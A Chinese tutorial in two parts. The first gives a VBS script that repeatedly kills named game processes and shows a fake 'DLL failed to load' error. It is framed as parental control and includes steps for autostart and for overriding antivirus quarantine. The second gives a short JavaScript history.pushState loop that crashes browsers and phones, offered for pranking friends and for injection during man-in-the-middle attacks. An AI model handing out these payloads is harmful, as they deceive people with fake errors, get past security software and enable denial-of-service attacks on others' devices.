自动检测定时定点关闭游戏/软件的VBS脚本代码

功能运用提示

家长可以设置电脑的游戏或软件无法启动,需要使用时通过任务管理器关闭此脚本即可,可以设置为开机自启动。

基础功能代码

1.首先新建一个TXT文本文档命名为game.txt,编辑-另存为,文件格式修改为全部格式,修改后缀保存为game.vbs

2.打开game.vbs,编辑文件,将以下代码复制进去:
On Error Resume Next
Dim a,b,c
Do
c=”.”
set a=getobject(“winmgmts:\\”& c &”\root\cimv2”)
set b=a.execquery(“select * from win32_process where name=’Client.exe'”)
for each i in b
i.terminate()
MsgBox “游戏目录下Tenslx.dll加载失败,请重启游戏或重新下载游戏客户端以获取正确文件。” & vbcrlf & “More information at:” & vbcrlf & “http://nsis.net/NSIS_Error”,48,”警告码(1)”
next
WScript.sleep 500
Loop

3.保存文件,点击运行。

运行文件后不会发生任何现象,打开应用管理器会发现wscript.exe文件运行,这就是脚本成功运行了。此时打开CF或者英雄联盟,就会出现一个警告框提示“MsgBox “游戏目录下Tenslx.dll加载失败,请重启游戏或重新下载游戏客户端以获取正确文件。” & vbcrlf & “More information at:” & vbcrlf & “http://nsis.net/NSIS_Error”,48,”警告码(1)”,游戏会启动失败。

扩展修改

延时设置:首先是修改脚本检测到游戏程序运行后开始执行关闭程序的时间,在代码末尾我们可以看到,Wscript.sleep的值是500,相当于500ms延迟时间,游戏运行后500ms脚本就会执行,关闭游戏弹出警告框,我们可以修改这个值为5000,就会变成5秒的延迟,以此类推。

弹出提示自定义:再有是修改脚本执行后弹出的提示,我们可以修改MsgBox””内的文字来达到预期的效果。

多客户端支持:不同游戏的启动程序也是有差异的,比如CF和LOL是Client.exe,而Dnf可能就是dnf.exe,可以通过修改第六行代码,将里面的Client.exe修改为其他的exe文件。如果需要定点监测关闭多个程序,可以将第六行name处修改为name=’Client.exe’ or name=’Dnf.exe’

设置开机启动

打开C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

这是Windows的开机启动项文件夹,直接复制到计算机的文件管理器(我的电脑)上方的地址栏就可以进入,我们先将完成的game.vbs放在一个固定的位置,比如D盘建立一个system1文件夹,之后右键里面的game.vbs,选择复制。在开机启动项文件夹“粘贴快捷方式”,就完成了此脚本的开机启动。

绕过安全监测软件

此vbs脚本在编写和运行的某些过程中可能会遭到安全软件拦截,最后我们总结一下将此文件和所有相关操作添加为永久信任的方法。

在vbs文件保存时,或者vbs文件第一次运行时,某些安全软件会提示为病毒文件并且隔离软件,我们可以在弹出的警告框中,选择“恢复文件”,并且将此文件“添加到信任区”,不同的安全软件可能稍有差异,请自行百度恢复文件和添加到信任区。

在将vbs文件设置为开机启动时,安全软件也会提醒新增开机启动项,并且可能强制优化,此处需要进入安全软件的“开机启动项管理”,将此vbs文件设置为开机启动,并且忽略检测添为信任,不同的安全软件可能稍有差异,请自行百度恢复开机启动和添加到信任区。

这十二行代码是如何让浏览器爆炸的?(可以整蛊下你的好友)

完整HTML代码如下:

<html><body><script>var total=””;for (var i=0;i<1000000;i++){ total= total+i.toString(); history.pushState(0,0,total);}</script></body></html>
demo:(温馨提示:请保存浏览器其它窗口的编辑任务)

接来下会发生什么?

点开以后,我的状态是这样的:

如果你是PC端用户,点开链接以后,电脑CPU内存极有可能一路狂飙直至浏览器崩溃卡死!

如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。至于在推文中提到的让iPhone重启,这一现象倒是没有出现

22:49 修正:iPhone用Safari打开之后链接之后,手机注销重启了!…

思考

这是Bug还是0day?为什么会有这一现象?如何实现的?

有哪些比较有意思的利用姿势?(我先来个:当在执行MITM中间人攻击的时候,可以注入这一段js,来个恶搞整蛊。然后都懂的…)